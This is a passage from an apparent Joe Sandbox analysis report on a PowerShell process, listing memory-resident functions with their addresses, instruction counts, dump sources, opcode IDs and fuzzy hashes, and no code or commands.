                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq
                          • API String ID: 0-1075809040
                          • Opcode ID: eb84a156c127e57459603c3b598b3a75f028b2f0aa7a11d8762b869e222bcd8f
                          • Instruction ID: 2651e2de72d123fdece4c8b44496cc380187c3369865534644c490bb3dc3757f
                          • Opcode Fuzzy Hash: eb84a156c127e57459603c3b598b3a75f028b2f0aa7a11d8762b869e222bcd8f
                          • Instruction Fuzzy Hash: B841F4F0B0070ADFCB258F698564B3A7BE2AF85794F188879D9019B251DB35EC80C753
                          Function 077452A8 Relevance: .7, Instructions: 706COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71b0729811829d9b2c954e3e0558e97b8cc08857e4712b42bde787596f1ad483
                          • Instruction ID: 52d8e475a12ffde080e9eef791e1654633c8dc7380cdefffbc9bbdff6081045d
                          • Opcode Fuzzy Hash: 71b0729811829d9b2c954e3e0558e97b8cc08857e4712b42bde787596f1ad483
                          • Instruction Fuzzy Hash: ED526CB4B00209DFDB54CB98C485A6ABBB2BF89354F25C469D905AF751CB32EC42CF91
                          Function 0774528B Relevance: .5, Instructions: 525COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a87580370fc8e00b29e93da549d015e7ad2c10644d6e980ca1de3ab3dded28e0
                          • Instruction ID: 2bfebb8f0693a28983c109ceb4efa6da2bce91f6c2cb3f205106541ea0bb8fe4
                          • Opcode Fuzzy Hash: a87580370fc8e00b29e93da549d015e7ad2c10644d6e980ca1de3ab3dded28e0
                          • Instruction Fuzzy Hash: 18225BB4B00205DFDB54CB98C585A69BBB2BF89754F25C4A9D819AF352CB32EC42CF41
                          Function 049D2FF0 Relevance: .5, Instructions: 473COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 606e22c565cdbc015f2f99c38efe5432c09efe66391bd4ee9ed91b83846b1fd4
                          • Instruction ID: 1a43239e47db3cc77d9f4bf470126253cbcbb5f5351ac9010562aaca4a21236e
                          • Opcode Fuzzy Hash: 606e22c565cdbc015f2f99c38efe5432c09efe66391bd4ee9ed91b83846b1fd4
                          • Instruction Fuzzy Hash: 1B123B74A012499FCB15CFA8C584AAEFBB2FF88310F24C569E815AB365C735ED41CB91
                          Function 07745989 Relevance: .4, Instructions: 395COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84c7576b21e2390f700f1a34bea41935afcaa4cc8bc7ba84e45780b25f8ec5e4
                          • Instruction ID: 72e3e29e0f4821116501fb32fffa575eb8f6a2dff0c37da6a6721e498890fbe5
                          • Opcode Fuzzy Hash: 84c7576b21e2390f700f1a34bea41935afcaa4cc8bc7ba84e45780b25f8ec5e4
                          • Instruction Fuzzy Hash: BDF168B4B00206DFDB54CB98C481A69BBB2FF85354F14C4A9E905AF752CB32EC46CB81
                          Function 049D39B0 Relevance: .3, Instructions: 317COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38e6ffbbc30ff88dc24ca571394cfc1fa07ae46b4a3663aaff37e1370f71956c
                          • Instruction ID: 3de8b07c689877b2db2c1922ffaa0cb58183674d0949d767cea88f8b7e340cb5
                          • Opcode Fuzzy Hash: 38e6ffbbc30ff88dc24ca571394cfc1fa07ae46b4a3663aaff37e1370f71956c
                          • Instruction Fuzzy Hash: 63D1E674A01219AFDB14CFA8D484AADFBB2FF88311F25C569E805AB351C735ED81CB91
                          Function 049D9180 Relevance: .3, Instructions: 316COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 903410fa1b0210d8cf77d8e13fc73b3f9cd98719089c5a9c19b07878bdfa5d0d
                          • Instruction ID: 03ff8c10d9247241e42d324757b3a4f993d7a5ed2baf2374bd5900330f9e6a8a
                          • Opcode Fuzzy Hash: 903410fa1b0210d8cf77d8e13fc73b3f9cd98719089c5a9c19b07878bdfa5d0d
                          • Instruction Fuzzy Hash: A2C18B75A002489FCB14EFA4D984A9DBBF6FF85314F158569E806AF265CB34EC49CB40
                          Function 049DF314 Relevance: .3, Instructions: 293COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5639291f4714c494f623af5a41b0d34afbb3491ccc523d9217bb5258dba93a5
                          • Instruction ID: cac90f03fb307ff82bc68d253b68c69c9678e8f9e0b1e6dbd017ee74b72b3f0f
                          • Opcode Fuzzy Hash: f5639291f4714c494f623af5a41b0d34afbb3491ccc523d9217bb5258dba93a5
                          • Instruction Fuzzy Hash: 5CC15E71E00209DFDB10CFA8D9867ADBBF6AF48314F14C539E416AB258EB74A845CB91
                          Function 049DFBE4 Relevance: .3, Instructions: 262COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b51b22bc09bb4f76bec5d0734183845398599d57322c0e03cabf3e038f160aaa
                          • Instruction ID: 1f6c857215e272bca1952db011feda3c63692b03dfbb5c0d9fdd447a37c9149c
                          • Opcode Fuzzy Hash: b51b22bc09bb4f76bec5d0734183845398599d57322c0e03cabf3e038f160aaa
                          • Instruction Fuzzy Hash: C3B16E71E00209DFDB10CFA8D98679DBBF6AF48314F14C539E816EB258EB74A845CB91
                          Function 07744EE1 Relevance: .2, Instructions: 249COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c934af3a8ccb2e74a8c14cdaf432ff10ed971bbed34124eb23c5b11fac37ee7
                          • Instruction ID: 1ae7a011bff8905eefd2ae33b41cc550591cf08050e1ea82eea6b96d9eea6b1f
                          • Opcode Fuzzy Hash: 7c934af3a8ccb2e74a8c14cdaf432ff10ed971bbed34124eb23c5b11fac37ee7
                          • Instruction Fuzzy Hash: D091D1B4B00205AFD714CB68C945B9EBBF2AF89344F148469E901BF791CB76EC45CBA1
                          Function 07744F00 Relevance: .2, Instructions: 247COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4d15a9a8a953834e80b35a5d172145e64a94e987926eca5d87c62b12d3504f7
                          • Instruction ID: bdc7c7f09545571440233e7683e2b5fb596cc6fab9100e78b8dd3622511b4ad8
                          • Opcode Fuzzy Hash: b4d15a9a8a953834e80b35a5d172145e64a94e987926eca5d87c62b12d3504f7
                          • Instruction Fuzzy Hash: 959180B4B10205AFD714DBA8C545BAEBBF3AF89344F148468E901BF791CB75EC418B91
                          Function 049D9948 Relevance: .2, Instructions: 231COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: acc4eda5099c87514eb81e39728e263d0dc37334d8e47bc79abae400fbbd1790
                          • Instruction ID: 741ce0db1c68136f7ca705a530f97f894a1276fbe3c05e5834d1b9e951aeebf7
                          • Opcode Fuzzy Hash: acc4eda5099c87514eb81e39728e263d0dc37334d8e47bc79abae400fbbd1790
                          • Instruction Fuzzy Hash: 3691AD71A002058FCB14EF68C880A9EBBF6FF84314F24C979E41A9B655DB74AC46CB80
                          Function 049D89E8 Relevance: .2, Instructions: 204COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab1166da7015608c95e18b4bcf4cf556cec3fe389bcd61af8fc58967b1ba04b3
                          • Instruction ID: 2c2e7cbca63747e31b5407466bd027a46c15daba5b9c49ba66e74b0262b2ab00
                          • Opcode Fuzzy Hash: ab1166da7015608c95e18b4bcf4cf556cec3fe389bcd61af8fc58967b1ba04b3
                          • Instruction Fuzzy Hash: 57818F34A05244DFCB15DF64C8849AEBBF2FF89314F1884A9E455AB362C735EC85CB50
                          Function 049D9AB6 Relevance: .2, Instructions: 188COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1a5a572d46f69da8f708ec8f398ce14d3669823390682272817f8b87d0e8c5c
                          • Instruction ID: 284565c4fb8f9e7d2338cbb27cca02252df5c79f32abf16f211c4e637673cf91
                          • Opcode Fuzzy Hash: d1a5a572d46f69da8f708ec8f398ce14d3669823390682272817f8b87d0e8c5c
                          • Instruction Fuzzy Hash: 08713AB1A00248DFDF18EFB4D594AADBBF6FF88304F148569D416AB690DB35AC85CB40
                          Function 049DF95D Relevance: .2, Instructions: 180COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73672533ab2badc2c16d121cdf1fa53eebd8bbb42d36ca7b5d959ac344c6569b
                          • Instruction ID: 769d8526279007f59afaf738d0784734ab57af25ca4dea232edd33aa7980254c
                          • Opcode Fuzzy Hash: 73672533ab2badc2c16d121cdf1fa53eebd8bbb42d36ca7b5d959ac344c6569b
                          • Instruction Fuzzy Hash: C1714E71E00249DFDB10CFA9C98679DBBF6EF88314F14C129E419AB258EB74A845CF91
                          Function 049DF968 Relevance: .2, Instructions: 180COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf3d46470ebb1ba3065f44feed99de73573d71983da99599d97cc8577e453da6
                          • Instruction ID: 6c946ea1ec53abedd966337f5662a461cd9e15d29d19877bd301c7179a3ac3ee
                          • Opcode Fuzzy Hash: bf3d46470ebb1ba3065f44feed99de73573d71983da99599d97cc8577e453da6
                          • Instruction Fuzzy Hash: 2E716D70E002499FDF10CFA9C98279DBBF6AF88314F14C139E409AB258EB74A845CB91
                          Function 049D96D9 Relevance: .1, Instructions: 119COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5ddc9d889b93eb403361f4ff2c025bd262fe3d65b109a057f37a00cde22d079
                          • Instruction ID: 417f3b558baf874b312795990c10adf1ebc4dfff750e61e6a49b51232b923c55
                          • Opcode Fuzzy Hash: f5ddc9d889b93eb403361f4ff2c025bd262fe3d65b109a057f37a00cde22d079
                          • Instruction Fuzzy Hash: 47418D71B002008FDB14EF64C958AADBBB6EF89750F188179E406EB7A5CF39AC41CB50
                          Function 07749FC5 Relevance: .1, Instructions: 117COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3f185284d036c261913b90068803137fdd61f32aa0d977a6243409a744b2dab
                          • Instruction ID: 76907c3af65831cb70e4d7529ec6fd948278322577bfff3ad78355604bb93cf0
                          • Opcode Fuzzy Hash: f3f185284d036c261913b90068803137fdd61f32aa0d977a6243409a744b2dab
                          • Instruction Fuzzy Hash: 4831AFF2B401009BCB2597BC48466AEBBA29FD9358F11C47AD602DF651EF31DC42C7A2
                          Function 049D2B48 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef76563be8bd3e407d57245e23a6e280b626dbb39316635704a9ff93edb7014d
                          • Instruction ID: e39b5ef65205c9b62d443d26d1753fe99acddf8e6f4efb73cfad0c608814e4ce
                          • Opcode Fuzzy Hash: ef76563be8bd3e407d57245e23a6e280b626dbb39316635704a9ff93edb7014d
                          • Instruction Fuzzy Hash: CF41D27590A3959FC702DF6CC8A04DABFB0EF4621070981D7D484DB363DA34AC49CBA5
                          Function 049D9933 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25ef4056291259199d80f9961d8042f3081fe622d83048b70e06220012bebfef
                          • Instruction ID: 5b7befb553f28eb619177bc2173e47d10f54b6f25746d6ebc47c6b9ca6d38b21
                          • Opcode Fuzzy Hash: 25ef4056291259199d80f9961d8042f3081fe622d83048b70e06220012bebfef
                          • Instruction Fuzzy Hash: 62418DB1A00209CFDB14EFA5C8846ADBBF2FF84314F14C66DD006AB795DB74A845CB80
                          Function 049D3440 Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 97d2c786a481562f17494292ca976c4f32a4f3b6058a7fd247bbaf69d4fc553f
                          • Instruction ID: 92c19db1a3c7961987c8600fd581a09606ec9f3127870c0e24a11cec40f6d083
                          • Opcode Fuzzy Hash: 97d2c786a481562f17494292ca976c4f32a4f3b6058a7fd247bbaf69d4fc553f
                          • Instruction Fuzzy Hash: B04137B4A005059FCB15CF99C498AAEFBB5FF48310F158669D905AB364C732FD91CBA0
                          Function 07747C36 Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 706848e3a502a2caccce047db731a3a76ee5593193e1f54929fe6f19cf87f76f
                          • Instruction ID: 2c3fc029fe43cf52bafec646344649057af0fc1717cbb57708f50fecce76f721
                          • Opcode Fuzzy Hash: 706848e3a502a2caccce047db731a3a76ee5593193e1f54929fe6f19cf87f76f
                          • Instruction Fuzzy Hash: 9731B3B4B10205AFDB089BA8C955BAEBE63AF95384F14C018F901AF791CF759C428BD1
                          Function 07740EE0 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 782724d3f2c5fe98e3223426811d242bead8477a1804ad6d972425e7579cb0a7
                          • Instruction ID: 8320dfc74e27cf1be3ec370abeb89ac7ceddf4737fdb4d717fd0b850160530e1
                          • Opcode Fuzzy Hash: 782724d3f2c5fe98e3223426811d242bead8477a1804ad6d972425e7579cb0a7
                          • Instruction Fuzzy Hash: D6216BB1304345ABCB2456BE4891B3BB6C6AFC5355F24887AA606CB381DF75CC81C761
                          Function 049DC4E8 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b0df06d19802cb70b6cdc01ce80af1d62a43eef2a7b074c7dc58551f8ba994c4
                          • Instruction ID: 1814a506d3a4b80113146a9d7fe51ddff78acecd3c82e5c80c8b9b786f0a9e03
                          • Opcode Fuzzy Hash: b0df06d19802cb70b6cdc01ce80af1d62a43eef2a7b074c7dc58551f8ba994c4
                          • Instruction Fuzzy Hash: F2313734B011688FCB26DB24C8946EEB7B6BF89304F1584E9C409AB355CF35AE91DF81
                          Function 07740EC3 Relevance: .1, Instructions: 86COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c84552926493f56e32d8ead32d8a96276f5e0c1293c036ddfe11bf8cd717151f
                          • Instruction ID: c727fe00aac0defa9788da9f9e9bf00b689e17e0ee5d60c068209a57debec56a
                          • Opcode Fuzzy Hash: c84552926493f56e32d8ead32d8a96276f5e0c1293c036ddfe11bf8cd717151f
                          • Instruction Fuzzy Hash: A7219BF2304385ABC7204A6A8891B76BBD5AFC6390F248466E641CB2C1EB79DC84C760
                          Function 049D3985 Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b16a6f79562de18d035e8b89907daa8824dcb4167501a002f6baecd1ed5c0be
                          • Instruction ID: d6be0b047eb6332afbc983f1fc532925cb0256de963742577876bc669dca7dc6
                          • Opcode Fuzzy Hash: 3b16a6f79562de18d035e8b89907daa8824dcb4167501a002f6baecd1ed5c0be
                          • Instruction Fuzzy Hash: 4D317874A04609DFCB10CF99C8909AAFBB1FF49310B1582A9D849EB762C731FC41CBA1
                          Function 049D2B37 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d8465909030d72cca206b49f2afcd809d8eff270ba288c6fa5661d8ba3607e4
                          • Instruction ID: 5378e32b9d21e048f4cfa2beb6a1de6bd0710df264ddfb6a91fe51b3c8ae7f06
                          • Opcode Fuzzy Hash: 2d8465909030d72cca206b49f2afcd809d8eff270ba288c6fa5661d8ba3607e4
                          • Instruction Fuzzy Hash: 32212CB5A002099FCB00CF98D4809AEFBF5FF89310B1485A9D945AB352C735ED41CBA1
                          Function 07740CD0 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 082af556b0912fb1fa2ca95230d4d6059ca8f23399cea747eb00090d69de41de
                          • Instruction ID: 4694da2187168cb48ef59b63f7991a53774d5817223babd8ee8e12579e20f5ff
                          • Opcode Fuzzy Hash: 082af556b0912fb1fa2ca95230d4d6059ca8f23399cea747eb00090d69de41de
                          • Instruction Fuzzy Hash: B6012B7630421A9FCF2059BAD400576FB95EFC1266F14C47FDA49CB241DB32D859CBA0
                          Function 049DF60B Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82dc06e0c9872a651c732ff13f25dc94fecdb9d9e08b58bdd8741564721800e4
                          • Instruction ID: e9fd6ea7b88c00109733dd0211351adf2853df31f792d0445499b687e3fbf6c1
                          • Opcode Fuzzy Hash: 82dc06e0c9872a651c732ff13f25dc94fecdb9d9e08b58bdd8741564721800e4
                          • Instruction Fuzzy Hash: BC11E930C0414CDBEF34DAA4D98A7ECB776AB4831DF549439C002B65A8EB7468C9CB11
                          Function 030CD01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012292550.00000000030CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_30cd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8eed7edec5ad77cd86adb32ac895f64613c46502c227d44a7e6d0787017491d1
                          • Instruction ID: ee7562240f88ed4fc2fd0b9026d02679309f30d56d066fa18db38254174efc4d
                          • Opcode Fuzzy Hash: 8eed7edec5ad77cd86adb32ac895f64613c46502c227d44a7e6d0787017491d1
                          • Instruction Fuzzy Hash: 1F0184724063809AE750CB2DCDC4B6AFFD8DF41364F2CC46EED494A282C6799941C6B1
                          Function 030CD01C Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012292550.00000000030CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_30cd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6c2c3d4d8f9a1f69afdaf0b64aef6a4ceab898a2ca2b089d8f6f39b04a4bcde
                          • Instruction ID: a9029ae3691f04dee3a29333dad3b788b4ebeec902e2e2e4efb2b9183cb30510
                          • Opcode Fuzzy Hash: f6c2c3d4d8f9a1f69afdaf0b64aef6a4ceab898a2ca2b089d8f6f39b04a4bcde
                          • Instruction Fuzzy Hash: DDF0C272405380AEE7108F19CDC4B67FFDCEB41234F28C06AED484A282C279A840CBB0
                          Function 049D4ADD Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012821422.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_49d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8fa6671bfa7c10689d16201035c53efa23730701566c7dd1735dfc493b23757
                          • Instruction ID: 0f79e9d063ee4de6baec7d71c41b9e65c6fe0c544b0f099c729e91c2048a667e
                          • Opcode Fuzzy Hash: a8fa6671bfa7c10689d16201035c53efa23730701566c7dd1735dfc493b23757
                          • Instruction Fuzzy Hash: 05F05E75A00104DFCB14CF99D8847AEFB75FF8C311B2484A9D69AA3650CB36AC53DB90
                          Function 07743104 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ed6d4def180ee6b8dde3353ef50a7bd010e33a8244a70bccd0bbfe0bfa34a251
                          • Instruction ID: b8844130df0871216824668867df8135b723b3cddd14e1ef15f931e034795ad3
                          • Opcode Fuzzy Hash: ed6d4def180ee6b8dde3353ef50a7bd010e33a8244a70bccd0bbfe0bfa34a251
                          • Instruction Fuzzy Hash: DFF030706097C19FE3128B24C854A20BB72BF43214F1DC5CAD4488F1A7C77ADC42C751

                          Non-executed Functions

                          Function 030CD338 Relevance: .1, Instructions: 70COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.3012292550.00000000030CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_30cd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ac4ea084ccf4568e9631701f5508f0a0cc5e5b4f570ad27cef558bb6efdfedd
                          • Instruction ID: f997f58dc3bea5384ae9a1d266d6f443f2933a4daf7e0d1f3292286fa543f032
                          • Opcode Fuzzy Hash: 5ac4ea084ccf4568e9631701f5508f0a0cc5e5b4f570ad27cef558bb6efdfedd
                          • Instruction Fuzzy Hash: 592127B1615284DFD704DF18DAC0B2EBBA9FBC4714F24CABEE8494B641C739D806C665
                          Function 07742440 Relevance: 12.8, Strings: 10, Instructions: 321COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.3034431217.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7740000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'sq$4'sq$4'sq$4'sq$$sq$$sq$$sq$$sq$$sq$$sq
                          • API String ID: 0-2946803269
                          • Opcode ID: 4aa6c32d41269a544d29897e087fa2d67bdc09a1a89b292f29cb49271ba2f407
